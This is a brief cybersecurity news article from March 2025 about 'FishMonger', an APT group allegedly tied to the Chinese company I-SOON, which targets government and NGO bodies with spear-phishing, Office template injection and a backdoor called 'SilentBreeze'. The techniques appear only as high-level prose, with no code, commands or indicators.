Chinese APT Group I-SOON Strikes Government and NGO Targets

21.03.2025

Recent cybersecurity research has uncovered an advanced threat actor known as “FishMonger,” allegedly operating under the Chinese company I-SOON, which has suspected ties to state-sponsored cyber espionage. This Advanced Persistent Threat (APT) group has been targeting government institutions and NGOs across Southeast Asia and parts of Europe since at least 2021.

FishMonger employs highly sophisticated attack techniques, including tailored phishing campaigns and custom malware designed to extract sensitive diplomatic and policy-related information. The group’s operations align with Chinese strategic interests, particularly focusing on organizations involved in South China Sea territorial disputes and international human rights monitoring.

A key component of their attack chain is the use of template injection in Microsoft Office documents and a custom backdoor known as “SilentBreeze.” This malware establishes command and control communication through encrypted channels, ensuring prolonged access to compromised networks. FishMonger also employs advanced evasion tactics, frequently updating its toolset to bypass security defenses.

The group’s attacks typically begin with spear-phishing emails containing malicious documents crafted for specific targets. Once opened, these files exploit vulnerabilities or use social engineering techniques to deploy multi-stage infections. SilentBreeze then establishes persistence by creating scheduled tasks that execute malicious PowerShell commands, enabling further payload downloads and remote access.

To evade detection, FishMonger relies on compromised third-party websites to mask its true command-and-control servers, complicating attribution and mitigation efforts. The group’s evolving techniques highlight the persistent cyber threats faced by government institutions and NGOs operating in politically sensitive regions.